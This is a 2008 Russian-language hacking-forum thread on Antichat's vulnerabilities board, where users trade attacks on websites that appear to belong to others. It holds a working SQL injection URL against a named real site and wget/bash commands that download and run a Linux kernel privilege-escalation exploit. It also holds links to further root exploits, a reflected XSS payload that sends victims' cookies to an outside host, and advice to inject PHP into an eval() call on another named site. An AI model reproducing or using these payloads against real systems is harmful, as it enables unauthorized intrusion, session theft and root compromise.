HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.02.2008, 00:29
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

samarin
на этом сайте всё работает
_http://www.svetotehnika.dn.ua/templates/svet/index.php?id=181&show=news&newid=-8459+union+select+1,column_name,3+from+information _schema.columns+where+table_name=0x323130335f666f7 2756d5f63617465676f72696573+limit+1,1/*
 
Ответить с цитированием

  #2  
Старый 28.02.2008, 03:45
~Taxa~
Новичок
Регистрация: 24.01.2008
Сообщений: 20
С нами: 9630275

Репутация: 15
По умолчанию

Добрый ночи хотел узнать у спецов в области Unix-Like можно ли в данной ОС
Linux 2.6.9-1.667 поднять права? Реально ли вообще?
 
Ответить с цитированием

  #3  
Старый 28.02.2008, 03:58
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
С нами: 10374086

Репутация: 1745


По умолчанию

~Taxa~

Цитата:
wget http://packetstormsecurity.org/0607-exploits/prctl.sh.txt

mv prctl.sh.txt prctl.sh

bash prctl.sh

Последний раз редактировалось KPOT_f!nd; 28.02.2008 в 04:01..
 
Ответить с цитированием

  #4  
Старый 28.02.2008, 04:51
~Taxa~
Новичок
Регистрация: 24.01.2008
Сообщений: 20
С нами: 9630275

Репутация: 15
По умолчанию

KPOT_f!nd не помогает если ли еще способы???
 
Ответить с цитированием

  #5  
Старый 28.02.2008, 12:54
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами: 10339586

Репутация: 1396


По умолчанию

Цитата:
http://milw0rm.com/exploits/2013
http://milw0rm.com/exploits/4756
если не сработает, тогда только искать тебе пассы и тыкатся на рута.
 
Ответить с цитированием

  #6  
Старый 28.02.2008, 17:57
SIdoy
Новичок
Регистрация: 19.09.2007
Сообщений: 12
С нами: 9812750

Репутация: 19
По умолчанию

Нашел пассивную xss, запрос такого вида:
http://site.ru/index.php?s=w&name=&level_min=%3C%73%63%72%69%70%7 4%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65% 28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%74 %74%70%3A%2F%2F%73%2E%6E%65%74%73%65%63%2E%72%75%2 F%64%6F%6F%6D%35%35%2E%67%69%66%3F%22%2B%64%6F%63% 75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%20%64%6F%63 %75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%72%6 5%70%6C%61%63%65%28%27%68%74%74%70%3A%2F%2F%64%6F% 6F%6D%35%35%2E%66%72%65%65%68%6F%73%74%69%61%2E%63 %6F%6D%2F%27%29%3C%2F%73%63%72%69%70%74%3E&level_m ax=&subclass2=any&dmg_max=

или тоже самое, что и:

http://site.ru/index.php?s=w&name=&level_min=<script>img = new Image(); img.src = "http://s.netsec.ru/123.gif?"+document.cookie; document.location.replace('http://site2.ru/')</script>&level_max=&subclass2=any&dmg_max=

Почему куки не приходят через Opera? Через IE все отлично! На других не тэстил.

Последний раз редактировалось SIdoy; 28.02.2008 в 18:04..
 
Ответить с цитированием

  #7  
Старый 28.02.2008, 19:51
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
С нами: 9584577

Репутация: 69
По умолчанию

Захожу на сайт скачать одну из нескольких лекций, а там ошибка.
т.е. ссылки я вижу, а в описании файла вот такая фигня.
--------------------------------------------------------
Warning: filesize() [function.filesize]: stat failed for /home/www/lyric/pathology.dn.ua/html/lecturies/anomalii.immunnogo.otveta.ukr.doc in /home/www/pathology.dn.ua/html/viewpage.php(26) : eval()'d code on line 56
--------------------------------------------------------
насколько я понимаю файл на сервере превышает максимально допустимый размер
или неправильно написанный скрипт по подсчету размера файла
--------------------------------------------------------
если просто пытаюсь найти уязвимый скрипт выбрасывает на главную сраницу.

можно ли это как-то использовать кроме выяснения полных путей?

Последний раз редактировалось samarin; 28.02.2008 в 20:04..
 
Ответить с цитированием

  #8  
Старый 29.02.2008, 00:46
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

просто он файла не нашел такого и все, недумаю, что ты сможешь использовать отсутствие файла
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #9  
Старый 29.02.2008, 08:40
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами: 10892546

Репутация: 2274


По умолчанию

samarin, eval()'d code on line 56 - тоесть там используется eval() попробуй в разные переменные по подставлять PHP код а вдруг чёнить получится...
 
Ответить с цитированием

  #10  
Старый 02.03.2008, 13:24
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
С нами: 10261766

Репутация: 1079


По умолчанию

Вопрос... Возможно ли провести инъекцию в mysql 3 ? Где-то видел статьи на тему, но не нашел. ps инъекция после where

Все, уже нашел, что невозможно Жаль...

Последний раз редактировалось Macro; 02.03.2008 в 13:29..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...